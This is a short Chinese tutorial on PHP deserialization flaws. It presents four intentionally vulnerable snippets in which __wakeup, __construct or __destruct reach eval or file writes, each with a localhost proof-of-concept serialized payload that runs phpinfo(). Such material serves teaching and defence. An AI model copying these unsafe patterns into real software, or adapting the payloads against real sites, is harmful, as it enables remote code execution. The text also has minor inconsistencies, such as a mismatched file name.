反序列化本身是没有漏洞的,但是当反序列化和一些魔术方法结合使用时就可能会产生安全风险。常用的魔术方法__wakeup
反序列化漏洞示例(__wekeup)
class A{var $test = "demo";function __wakeup(){eval($this->test);}}$b = new A();$c = serialize($b);$a = $_GET['test'];$a_unser = unserialize($a);#漏洞利用poc http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:10:"phpinfo();";}
解释:传入的参数被反序列化,导致魔术方法__wakeup被自动调用,这时参数传入的值将被作为eval的参数使用,所以这里会因反序列化导致任意代码执行。
反序列化漏洞(__wakeup和文件操作)
require "test.php";//测试方便class A{var $test = '123';function __wakeup(){$fp = fopen("test.php", "w");fwrite($fp, $this->test);fclose($fp);}}$a = new A();print_r(serialize($a));$class1 = $_GET['test'];$class1_unser = unserialize($class1);利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();?>";}
解释:和上面一一样,当传入的参数被反序列化时,魔术方法__wakeup被调用,传入的参数会作为fwrite的第二个参数直接写入test.php文件中,从而导致反序列化漏洞
反序列化漏洞示例(__construct)
require 'test.php';class b{function __construct($test){$fp = fopen("test.php", 'w');fwrite($fp, $test);fclose($fp);}}class a{var $test = 123;function __wakeup(){$obj = new b($this->test);}}$class = $_GET['test'];$class_u = unserialize($class);利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:1:"A":1:{s:4:"test";s:18:"<?php phpinfo();?>";}
解释:unserialize()会自动调用__wakeup(),__wakeup中实力化a,这时会调用构造函数__construct,因为构造函数被调用,所传入的参数会作为fwrite的参数写入shell.php文件,从而造成代码执行
类的普通方法——反序列化问题
class maniac{public $test;function __construct(){$this->test = new x1();}function __destruct(){$this->test->action();}}class x1{function action(){echo "123";}}class x2{public $test2;function action(){eval($this->test2);}}$class2 = new maniac();unserialize($_GET['test']);漏洞利用poc:http://127.0.0.1:8999/test/unserialize1.php?test=O:6:"maniac":1:{s:4:"test";O:2:"x2":1:{s:5:"test2";s:10:"phpinfo();";}}
解释:maniac实例化,构造方法(\_\_construct)被调用,x1被示例化;反序列执行,析构方法(\_\_destreuct)被调用;如果$\_GET没有传入合法的序列化字符串,就会自动调用x1的action方法,如果$\_GET接收到正确的序列化字符串,那么析构方法就会调用x2的action方法,从而这里就有可能导致任意命令执行